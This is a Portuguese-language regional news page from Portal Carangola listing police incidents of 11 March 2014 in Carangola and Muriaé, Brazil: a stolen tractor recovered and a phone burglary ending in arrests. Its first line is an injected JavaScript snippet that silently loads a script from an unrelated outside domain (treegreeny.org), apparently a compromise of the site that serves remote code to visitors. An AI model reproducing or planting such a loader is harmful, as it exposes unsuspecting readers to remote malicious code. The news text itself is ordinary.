;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais em destaque-Carangola e Região 11/03/2014 - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais em destaque-Carangola e Região 11/03/2014

pmbn

OCORRÊNCIAS DE DESTAQUE MURIAÉ – 11/03/2014

                        75ª CIA PM- CARANGOLA-MG

NADA REGISTRA.

                         76ª CIA PM – MURIAÉ

 VEÍCULO PRODUTO DE FURTO LOCALIZADO EM MURIAÉ-MG.

                    Em 10/03/2014, por volta das 07hs54min, policiais militares compareceram a Fazenda Tapera, no distrito de Bom Jesus da Cachoeira, em Muriaé, e em contato com M.R.G., de 18 anos e o Policial Civil Alexssander Bouzada, foram informados do furto de um trator marca Massey Fergunson, de cor vermelha, nº de série 4398470810085. Os policiais militares da 76ª Cia PM – Muriaé, juntamente com o policiais militares do Dst de Miraí, pertencente a 146ª Cia PM – Cataguases(área do 21º BPM) e associado aos trabalhos do policial civil, saíram em rastreamento a fim de localizarem o trator, logrando êxito em sua localização no sítio paraíso, localizado no município de Miraí, ficando esclarecido pelo caseiro daquele sítio que por volta das 05hs da manhã, um indivíduo o procurou pedindo que guardasse o trator, pois iriam realizar um trabalho nas proximidades, tomando rumo ignorado em uma motocicleta. O trator foi recolhido a delegacia de polícia em Muriaé.

FURTO CONSUMADO EM RESIDÊNCIA E RECEPTAÇÃO EM MURIAÉ-MG.

            Em 11/03/2014, por volta das 03h53min, policiais militares compareceram à Artur Miranda, e fizeram contato com o solicitante, o qual relatou haver detido o adolescente P.H.S, de 17 anos, tendo em vista que se encontrava dormindo em sua residência no bairro Inconfidência, quando escutou seus cães latindo insistentemente, que ao acordar e verificar o que ocorria, deu por falta dos três celulares da marca Samsung, tendo saído imediatamente em seu veículo particular a procura dos autores. Ocorre que ao chegar à Rua ARTHUR MIRANDA, deparou com o adolescente e seu comparsa E.H.M.B., de 20 anos, os quais evadiram ao avistar o solicitante que é policial militar, entretanto ele conseguiu conter o adolescente, e ao submeter-lhe a uma busca pessoal, localizou no interior da cueca dele um de seus aparelhos. Já o comparsa evadiu pela Rua Genuíno Scoparo. Em conversa com o adolescente infrator, este afirmou que quem teria furtado os celulares foi o autor E.H.M.B., de 20 anos, e que ele apenas iria usar crack com o comparsa, que os outros dois aparelhos foram vendidos ao taxista conhecido por I.S., de 71 anos, que foi localizado no ponto de táxi onde trabalha, sendo encontrado os outros dois aparelhos que faltavam em posse do taxista, que foi perguntado sobre a procedência dos objetos, tendo afirmado que os adquiriu do adolescente infrator pela quantia de R$ 20,00 reais, e que na companhia dele estava o comparsa que havia fugido. O taxista afirmou também que os dois envolvidos teriam quebrado os chips que estavam no interior dos aparelhos, contudo o adolescente infrator afirmou que teriam entregue os aparelhos ao taxista com os chips em seu interior e que quem os teria quebrado fora o taxista. Durante uma busca no adolescente, foi localizada ainda uma pedra de crack com o mesmo. O solicitante proprietário da residência relatou que não houve arrombamento, mas acredita que para o cometimento do crime os autores transpuseram o muro localizado nos fundos de sua residência. O adolescente infrator foi apreendido em flagrante e o taxista preso por receptação, sendo ambos conduzido/encaminhado para a Delegacia de Polícia com os aparelhos furtados.

     ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.